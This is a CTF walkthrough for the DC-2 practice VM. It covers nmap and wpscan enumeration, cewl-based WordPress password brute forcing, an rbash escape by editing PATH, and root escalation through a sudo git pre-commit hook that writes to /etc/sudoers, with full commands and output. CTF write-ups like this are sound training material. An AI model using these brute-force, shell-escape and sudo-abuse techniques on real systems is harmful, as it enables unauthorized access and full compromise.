Home

DC919 CTF night w/"DC-2"

DC919 CTF exercise night using "DC-2" prebuilt VM image

SPOILER ALERT: This document is intended to be a walk-through, so if you want to do this CTF challenge honestly, close this page now.

Credits

The following is the result of a group effort during a CTF conf call. There were a bunch of people present on the call, and if they ask me to I'll happily list them here. We share lots of tricks during these calls, everyone contributes and we all come out of it smarter.

Setup

• VirtualBox with a Host-Only network, DHCP server enabled using address range 192.168.57.0/24
• Kali Linux VM in VirtualBox setup with 2 NICs: 1 Bridged to your LAN or NAT, 1 Host-Only
• DC-2 target VM in VirtualBox setup with 1 NIC: attached to Host-Only network, above.
• Be sure you can login to Kali and identify/ping your target VM.
• We have no credentials for the target at this time, and must discover them.

According to the author's description, you must add a hosts(5) entry or the CMS running will not work correctly:

192.168.57.3 dc-2

In this case the VMs have the following IPs:

• Kali: 192.168.57.254
• DC2: 192.168.57.3

Process

nmap -A -sS -p1-65535 dc-2

This eventually returns apache+wordpress on 80, sshd on 7744

visiting in a browser shows a 'Flag' link with the following text:

Flag 1:

Your usual wordlists probably won't work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can't win them all.

Log in as one to see the next flag.

If you can't find it, log in as another.

Need to do the following because wpscan breaks on single-word domains (see dc6 writeup):

apt update
apt install libz-dev
gem update cms_scanner
gem update wpscan

wpscan -o wpscan2.txt -e ap --plugins-detection aggressive --url http://dc-2/

This reveals WordPress version 4.7.10 (insecure, released 2018-04-03)

Plugin akismet (out of date: 3.3.2)

Kali contains a program called "cewl" (looks like the hint from flag1 references this..), which is a wordlist generator

Run like this:

cewl http://dc-2/ >wordlist.txt

Trying to use this to brute force some passwords, wpscan enumerates a few users: admin, jerry, tom

wpscan -P wordlist.txt --url http://dc-2/

Got a few passwords:

[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient

Using these (I used 'jerry' for this), navigating around /wp-admin/ links, I found a page named "Flag 2":

Flag 2:

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

Trying usernames/passwords with SSH (port 7744, remember?), 'tom' works but gives a weird stunted shell, which I quickly recognized as 'rbash'. Everything obvious but 'ls' showed a command not found error. "echo $PATH" gives a single directory, and modifying $PATH fails because rbash.

"ls" command works, shows a "flag3.txt":

"ls -alR" shows .bashrc/.bash_profile shellrc files, flag3.txt, and the directory in $PATH with four valid commands: less, ls, scp, vi

cat/more/all sorts of commands DO NOT work, though, but tab completion does, so enumerating commands one beginning-letter at a time (a<TAB>, b<TAB>, c<TAB>, etc) gets you to 'l' which reveals that "less" is allowed:

less flag3.txt

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

There's more than one method allowed here to break out of rbash, so might as well show some hints at a few of them.

The crux of the problem with rbash is that you may only execute binaries located in $PATH, and the $PATH variable immutable. However, if you look closely at "ls -alF ~" you can see .bashrc and .bash_profile are both writable as the "tom" user. This is the easiest thing to exploit here. You can use "less", "vi", or even "scp" them off the target to read them. Very short shell rc files with only one line. PATH.

To change your $PATH, you can either "vi" these files directly, or you can scp them off, edit them, then scp them back. Both methods work fine. While researching this one, I found that in a more restrictive rbash environment, even "scp -S" can be used to run a custom script and break out, although it is more cumbersome to do.

'vi' also appears to be allowed, but inside rbash, you can't shell out ...

"ls -alF" appears to show .bashrc and .bash_profile as being writable by 'tom', the user we're logged in as, so go ahead and "vi" them, then change PATH

export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/home/tom/usr/bin

now upon logging in, you get a more usable shell with all commands; using flag3's hint of "su jerry", we get jerry's account, which we might as well have a look around from:

tom@DC-2:~$ su jerry
Password: adipiscing 
jerry@DC-2:/home/tom$ cd
jerry@DC-2:~$ ls
flag4.txt
jerry@DC-2:~$ cat flag4.txt 
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

More enumeration shows this (which follows the hint, above):

jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git

Privilege Escalation!

Using this "sudo git" approach, I used previous knowledge of git executing arbitrary shell commands to come up with a pre-commit hook that added me to sudoers(5), like this:

jerry@DC-2:~$ mkdir a_git_repo
jerry@DC-2:~$ cd a_git_repo/
jerry@DC-2:~/a_git_repo$ git init .
Initialized empty Git repository in /home/jerry/a_git_repo/.git/
jerry@DC-2:~/a_git_repo$ cat >.git/hooks/pre-commit <<EOF
> #!/bin/sh
> 
> echo "jerry ALL = NOPASSWD: ALL" >>/etc/sudoers
> EOF
jerry@DC-2:~/a_git_repo$ chmod +x .git/hooks/pre-commit
jerry@DC-2:~/a_git_repo$ echo "root" >root.txt
jerry@DC-2:~/a_git_repo$ git add root.txt 
jerry@DC-2:~/a_git_repo$ sudo git commit -m "root"
[master (root-commit) d9e3302] root
 Committer: root <root@DC-2>
...
 1 file changed, 1 insertion(+)
 create mode 100644 root.txt
jerry@DC-2:~/a_git_repo$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
jerry@DC-2:~/a_git_repo$ sudo id
uid=0(root) gid=0(root) groups=0(root)
root@DC-2:~# ls /root
final-flag.txt
root@DC-2:~# cat /root/final-flag.txt 
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

© 2019 systat | Powered by OpenBSD | Built with ssg3